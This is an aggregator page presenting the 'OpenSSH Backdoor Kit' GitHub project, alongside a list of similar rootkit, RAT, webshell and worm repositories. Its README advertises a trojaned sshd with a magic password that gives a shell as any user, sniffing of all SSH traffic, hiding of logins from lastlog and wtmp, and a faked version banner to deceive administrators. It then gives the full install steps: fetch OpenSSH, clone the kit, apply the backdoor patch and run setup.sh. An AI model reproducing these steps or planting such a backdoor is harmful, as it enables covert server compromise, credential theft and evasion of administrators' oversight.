All Projects β†’ jivoi β†’ Openssh Backdoor Kit

jivoi / Openssh Backdoor Kit

πŸ’£ just for fun Β―\_(ツ)_/Β―

Programming Languages

shell
77523 projects

Projects that are alternatives of or similar to Openssh Backdoor Kit

Webshell
Webshell && Backdoor Collection
Stars: ✭ 1,056 (+400.47%)
Mutual labels:  backdoor, rootkit
Vegile
This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process,unlimited your session in metasploit and transparent. Even when it killed, it will re-run again. There always be a procces which while run another process,So we can assume that this procces is unstopable like a Ghost in The Shell
Stars: ✭ 601 (+184.83%)
Mutual labels:  backdoor, rootkit
Umbra
A LKM rootkit targeting 4.x and 5.x kernel versions which opens a backdoor that can spawn a reverse shell to a remote host, launch malware and more.
Stars: ✭ 98 (-53.55%)
Mutual labels:  backdoor, rootkit
Father
LD_PRELOAD rootkit
Stars: ✭ 59 (-72.04%)
Mutual labels:  backdoor, rootkit
Vegile
This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process,unlimited your session in metasploit and transparent. Even when it killed, it will re-run again. There always be a procces which while run another process,So we can assume that this procces is unstopable like a Ghost in The Shell
Stars: ✭ 478 (+126.54%)
Mutual labels:  backdoor, rootkit
S6 pcie microblaze
PCI Express DIY hacking toolkit for Xilinx SP605
Stars: ✭ 301 (+42.65%)
Mutual labels:  backdoor, rootkit
satan
πŸ”“ x86 Linux Kernel rootkit for Debian 9 (4.9.0-11-686-pae)
Stars: ✭ 31 (-85.31%)
Mutual labels:  backdoor, rootkit
Diamorphine
LKM rootkit for Linux Kernels 2.6.x/3.x/4.x/5.x (x86/x86_64 and ARM64)
Stars: ✭ 725 (+243.6%)
Mutual labels:  backdoor, rootkit
Malware
Rootkits | Backdoors | Sniffers | Virus | Ransomware | Steganography | Cryptography | Shellcodes | Webshells | Keylogger | Botnets | Worms | Other Network Tools
Stars: ✭ 156 (-26.07%)
Mutual labels:  backdoor, rootkit
Grok Backdoor
Simple python backdoor with Ngrok tunnel support
Stars: ✭ 151 (-28.44%)
Mutual labels:  backdoor
Php Antimalware Scanner
AMWScan (PHP Antimalware Scanner) is a free tool to scan php files and analyze your project to find any malicious code inside it.
Stars: ✭ 181 (-14.22%)
Mutual labels:  backdoor
Proton
Proton Framework is a Windows post-exploitation framework similar to other Windows post-exploitation frameworks. The major difference is that the Proton Framework does most of its operations using Windows Script Host, with compatibility in the core to support a default installation of Windows 2000 with no service packs all the way through Windows 10.
Stars: ✭ 142 (-32.7%)
Mutual labels:  backdoor
Awesome Windows Security Development
awesome-windows-security-development
Stars: ✭ 154 (-27.01%)
Mutual labels:  rootkit
Mouse
Mouse Framework is an iOS and macOS post-exploitation framework that gives you a command line session with extra functionality between you and a target machine using only a simple Mouse payload. Mouse gives you the power and convenience of uploading and downloading files, tab completion, taking pictures, location tracking, shell command execution, escalating privileges, password retrieval, and much more.
Stars: ✭ 186 (-11.85%)
Mutual labels:  backdoor
Pyiris Backdoor
PyIris-backdoor is a modular, stealthy and flexible remote-access-toolkit written completely in python used to command and control other systems. It is now in the beta stage, possibly perpetually. There are bugs still present in the framework, feel free to contribute or help me out with this project its still under active development >_>
Stars: ✭ 145 (-31.28%)
Mutual labels:  backdoor
Webshell
ε…₯δΎ΅εˆ†ζžζ—Άε‘ηŽ°ηš„WebshellεŽι—¨
Stars: ✭ 201 (-4.74%)
Mutual labels:  backdoor
Networm
Python network worm that spreads on the local network and gives the attacker control of these machines.
Stars: ✭ 135 (-36.02%)
Mutual labels:  backdoor
Evilosx
An evil RAT (Remote Administration Tool) for macOS / OS X.
Stars: ✭ 1,826 (+765.4%)
Mutual labels:  backdoor
Pentest Tools Framework
Pentest Tools Framework is a database of exploits, Scanners and tools for penetration testing. Pentest is a powerful framework includes a lot of tools for beginners. You can explore kernel vulnerabilities, network vulnerabilities
Stars: ✭ 211 (+0%)
Mutual labels:  backdoor
Betterbackdoor
A backdoor with a multitude of features.
Stars: ✭ 195 (-7.58%)
Mutual labels:  backdoor

OpenSSH 6.7p1 backdoor kit

coded by bl0w. [email protected]

Features:

  • magic password to get shell with any user (encrypted or no)
  • sniffs all in/out from ssh/sshd, log file encrypted or no.
  • you can chose directory of log decryptor and directory of sniff-logs.
  • all connections accepted by backdoor wont logged by lastlog/wtmp/udp.
  • simple setup, just setup.sh!
  • fake banner and fake version, if admin do ssh -v or sshd -v banner will be faked! :~

Get started:

Follow instructions, it`s very easy!

$ apt-get install -y libpam0g-dev
$ wget http://www.mirrorservice.org/pub/OpenBSD/OpenSSH/portable/openssh-6.7p1.tar.gz
$ tar -xzvf openssh-6.7p1.tar.gz
$ cd openssh-6.7p1
$ git clone https://github.com/jivoi/openssh-backdoor-kit.git
$ cp -v openssh-backdoor-kit/* ./
$ patch -p1 < backdoor.patch
$ sh setup.sh

You can manually start:

$ /etc/init.d/ssh stop
$ /root/openssh-6.7p1/sshd -dd -f /etc/ssh/sshd_config
Note that the project description data, including the texts, logos, images, and/or trademarks, for each open source project belongs to its rightful owner. If you wish to add or remove any projects, please contact us at [email protected].